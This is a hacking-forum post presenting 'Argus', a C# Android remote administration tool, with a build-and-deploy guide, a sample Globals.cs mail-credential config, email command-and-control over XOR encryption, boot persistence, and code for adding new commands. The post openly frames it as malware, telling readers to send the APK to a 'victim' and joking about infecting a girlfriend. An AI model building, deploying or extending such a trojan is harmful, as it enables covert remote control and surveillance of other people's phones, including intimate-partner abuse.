Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Sign in to follow this  
      dEEpEst

      Android Remote Administration Tool: Argus - RAT [C#]

      Recommended Posts

      TheDoctor says:

      This is an Android application, which runs a background service on boot to receive commands. Sounds simple, is simple.

      Features

      • Background service, which is able to receive commands
      • Service is running on boot
      • C&C via E-Mail (And here we got the first point, which should get discussed… See below 

        Hidden Content

          Give reaction to this post to see the hidden content.
        )
      • Communication is encrypted with XOR (Yeeha, directly got the second discussion point 

        Hidden Content

          Give reaction to this post to see the hidden content.
        )
      • A solid error-handling, that our Client doesn’t crash due to connection errors or invalid input 

        Hidden Content

          Give reaction to this post to see the hidden content.
      • Remote Administration via Windows application (Should run under Linux with Mono too… Maybe someone here want to test it?)

      Commands

      At the moment I only included two POC commands to show how commands in generell can be added. Of course these ones are pretty boring, but you can easily extend the RAT with your one ones! And I’ll add more useful commands in the next days/weeks.

      • Show a Toast
      • Open a webpage

      Why do you use E-Mail for C&C?

      Mmh… I didn’t want to use Reverse TCP and have recently read about E-Mail C&C, which I wanted to try out. At the moment I’ve got no problems with this decision, but you should add FTP support, when you want to send files or big data back to your Server.

      XOR-encryption? Are you fuckin’ serious, man?

      Of course that’s not meant for real protection 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . I just wanted to have something to hide my communication from “normal” people. I’ll add AES + Some sort of origin-validation, which takes us to the next point:

      WARNING

      At the moment anyone can hijack the connection and send commands to our Client, who knows the Server’s Mail address (Password’s not needed; keyword is spoofing), the Client’s Mail address andthe XOR key! I don’t think you want anyone to send weird messages to your Girlfriend, after you infected her with the RAT, so I’ll fix this soon 

      Hidden Content

        Give reaction to this post to see the hidden content.
      .


      Setup

      Here comes the newbie friendly guide on how to build an APK out of the source code, setup the required Mail addresses and use the Control Server for sending commands! I use Win10 64-Bit with Visual Studio 2015. Other OSs and IDEs couldwork, but are not supported! Ok, now after I’ve created a bad mood for the Linux and Mac users here, we can go further on 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . (Little side note: I would have used Linux, but sadly Xamarin is only available for Windows and MacOS… And programming in Java is out of discussion)

      Client

      First you have to install Visual Studio with Xamarin. Don’t know how? See 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . Now download the project from my 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . Run Visual Studio and open the project:

      Hidden Content

        Give reaction to this post to see the hidden content.
       


      Select now the Project file:

      Hidden Content

        Give reaction to this post to see the hidden content.

      Now you only have to open the Globals file from the project Argus - RAT. Not Argus - RAT ~ Server!

      Hidden Content

        Give reaction to this post to see the hidden content.

      You should see the Globals.cs file now in the middle of your screen.

      Hidden Content

        Give reaction to this post to see the hidden content.
       


      Here’s the only place you have to edit. If you don’t know what you’re doing, don’t touch other files! It’s not needed.

       

      Ok, as you see you’ll need two Mail addresses, which you have to create on your own. As an example I use 

      Hidden Content

        Give reaction to this post to see the hidden content.
      , because they don’t check anything, so you can easily create the addresses anonymously, but I don’t know wether you understand the page, without a knowledge of german 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . Of course you can use Gmail too, but they always ask me for validation via phone call…

      Anyway, the important part is that you may have to allow POP & IMAP access to your account in the Mail settings of your provider! 

      Hidden Content

        Give reaction to this post to see the hidden content.
      needs it and I think others need it too! Just google around, if you don’t know 

      Hidden Content

        Give reaction to this post to see the hidden content.
      .

      If you use another provider and not 

      Hidden Content

        Give reaction to this post to see the hidden content.
      , you’ll have to change the Mail Server settings in Globals.cs too! And another time, just google around for POP & SMTP address + ports and I’m sure you’ll find it 

      Hidden Content

        Give reaction to this post to see the hidden content.
      .

      Ok, after you’re done fill in your details in Globals.cs:

      //-\\-//-\\-//-\\-//-\\-//- MAIL STUFF -\\-//-\\-//-\\-//-\\-//-\\
      
              // MAIL SERVER       Only needs to be changed, when you use another provider
              public String MailServerPopAddress  = "pop3.web.de";
              public String MailServerSmtpAddress = "smtp.web.de";
              public int MailServerSmtpPort       = 587;
              public int MailServerPort           = 995;
      
              // CLIENT
              public String ClientMailAddress     = "[email protected]";   // The address of the client
              public String ClientMailPass        = "p455w0rd";    // The password of your Client's mail address
      
              // SERVER
              public String ServerMailAddress     = "[email protected]";    // The address of your Server
      
              // ENCRYPTION
              public String XorKey                = "testKeyOfDoom";   // The key you use for encrypion. Please use something hard, because you won't have to fill it in any forms multiple times. You'll just have to fill it in, when you add the Client to your Server (See later) and then you can just forget it!
      

      After you changed the relevant values check them twice! You won’t get a second chance. When the .APK is sent to your victim and it doesn’t work, it’ll get interesting to tell him/her that he/she has to install your “new” version of the program, just because you filled in the wrong credentials…

      Sure that you’re ready? Then we come to the building process… First, change the mode to “Release”:

      Hidden Content

        Give reaction to this post to see the hidden content.

      Then select Tools -> Android -> Publish Android App. Now you should get a screen like this one, if you do it the first time:

      Hidden Content

        Give reaction to this post to see the hidden content.

      Just fill in whatever you like to create new keys for signing and continue. On the next screen choose the path to save it to and the name. Ready? Click Publish! Now it takes some time…

      When it’s finished, you got a fully working Android Remote Administration Tool! Just send the .APK to your victim and when he/she installs and opens it you’re in!

      Server

      The setup of our Server is much easier. Either open the Argus - RAT ~ Server project in Visual Studio and run it by pressing F5 or search the Argus - RAT ~ Server directory manually and run the executable in the Release directory. That’s up to you 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . Anyway, you’ll get this:

      Hidden Content

        Give reaction to this post to see the hidden content.

      Yes, not that great stuff… As I said above, I’ve only added two POC commands, but I’ll explain later how you can add your very own functions!

      For now just click Add Client.

      Hidden Content

        Give reaction to this post to see the hidden content.

      Explanation
      Name: The name you want to call your Client. It’s just a description and does not depend on anything, so you can choose whatever you want 

      Hidden Content

        Give reaction to this post to see the hidden content.
      .

      Client’s Mail address: The address you chose for your Client.

      Server’s Mail address: The address you’ll use for the Server.

      Server’s Mail password: 

      Hidden Content

        Give reaction to this post to see the hidden content.
       Don’t know what should be here? Please just go to 

      Hidden Content

        Give reaction to this post to see the hidden content.
       or any other kids place…

      Encryption Key: The key you used in the Globals.cs file! Upper and lower case is respected!

      And that was it. Now you can select the Client via ComboBox and send him commands:

      Hidden Content

        Give reaction to this post to see the hidden content.


      Developer?

      You are a developer and want to extend the RAT’s features? Then you’re exactly the kind of person I appreciate here 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . Ok, to make it easier for you I’ll explain every step you have to make, when you want to add your function!

      I hope you’ve already opened the project in Visual Studio. If not, do so. The important files are:
      Argus - RAT

      • MainService.cs
      • Commands.cs

      Argus - RAT ~ Server

      • Commands.cs

      And you should add your own entry in the Form. That’s up to you, how you want to do it, so I don’t explain this step.

      Every file is open? Great, let’s go on.

      Think about it…

      What do you want as a new function? What arguments are needed? Which name do you want to give the command? These questions have to be answered before you continue.

      As an example I’ll use the Toast command I already added.
      Name: Toast
      Argument(s): Text

      Server (Commands.cs)

      In the Commands.cs file you only have to add a function like this one:

              /// <summary>
              /// Sends a Toast to Client
              /// </summary>
              /// <param name="text">The Toast to show</param>
              public bool SendToast(String text)
              {
                  String body = "Toast:" + text;
                  return SendMail(body);
              }
      

      Please put it below the /* Commands*/ comment, so that everything’s in the right order 

      Hidden Content

        Give reaction to this post to see the hidden content.
      .

      Explanation
      The only thing I have to explain is the String body = "Toast:" + text;. The "Toast:" is used to identify the command when it arrives at your client. Just change Toast with the name you’ve chosen fo your function and the arguments behind with the ones you need. If you got any questions feel free to ask me 

      Hidden Content

        Give reaction to this post to see the hidden content.
      .

      Client

      In the MainService.cs you just have to add an else if to the handleCommand() function. Example:

      else if (cmd == "toast")
                      Commands.ShowWebsite(value);
      

      Make sure to use lowercase even when you used uppercase at Server-side. The command will be made lowercase, when it arrives at the client!

      value is everything behind the colon.

      And now the setup is finished and you can start writing your own function! Open Commands.cs and add your Code. For example:

              /// <summary>
              /// Shows the given text as toast
              /// </summary>
              /// <param name="text">Text to toast out</param>
              public static void ShowToast(String text)
              {
                  Application.SynchronizationContext.Post(_ => { Toast.MakeText(Android.App.Application.Context, text, ToastLength.Long).Show(); }, null);
              }
      

      Now you’ve made your own function within about 5 minutes!

      Conclusion

      Wow, it got longer than I thought 

      Hidden Content

        Give reaction to this post to see the hidden content.
      . For everyone who wants to test out his own features or just want to try the RAT without using any samrtphone, I can recommend 

      Hidden Content

        Give reaction to this post to see the hidden content.
      ! It is annoying as CAPTCHAs, but very helpfull, if you just want to easily test your apps in a nearly real environment.

      |-TheDoctor-|

      Hidden Content

        Give reaction to this post to see the hidden content.

      • Like 6
      • Thanks 3

      Share this post


      Link to post
      Share on other sites

       is annoying as CAPTCHAs, but very helpfull, if you just want to easily test your apps in a nearly real environment.

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.
      Sign in to follow this  

      • Similar Content

        • By dEEpEst
          Emoji Letter Converter For Android v1.3.0 (Premium)
          Best Apps For Converting Text To Emojis. Lots Of Emojis Also Default Shapes And Letters Are Included.
           

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By dEEpEst
          WARNING — Malware Found in CamScanner Android App With 100+ Million Users
          ◾️Beware! Attackers can remotely hijack your Android device and steal data stored on it, if you are using free version of CamScanner, a highly-popular Phone PDF creator app with more than 100 million downloads on Google Play Store.
          ◾️So, to be safe, just uninstall the CamScanner app from your Android device now, as Google has already removed the app from its official Play Store.
        • By dEEpEst

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By dEEpEst

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
          ANDRAX is a Penetration Testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful than a common distribution!
          The development of ANDRAX began on 08/09/2016 (DD/MM/YYYY) only for people in Brazil
          ANDRAX has been fully redefined and reloaded on 05/10/2018 (DD/MM/YYYY) open to the international public.
          ANDRAX enable to all Android device with root access enabled and a good unlocked rom become a weapon for advanced Penetration Testing.
          CHANGELOG:
          v4 BUILD:1 [ 25/11/2019 ]

          Hidden Content
          Give reaction to this post to see the hidden content.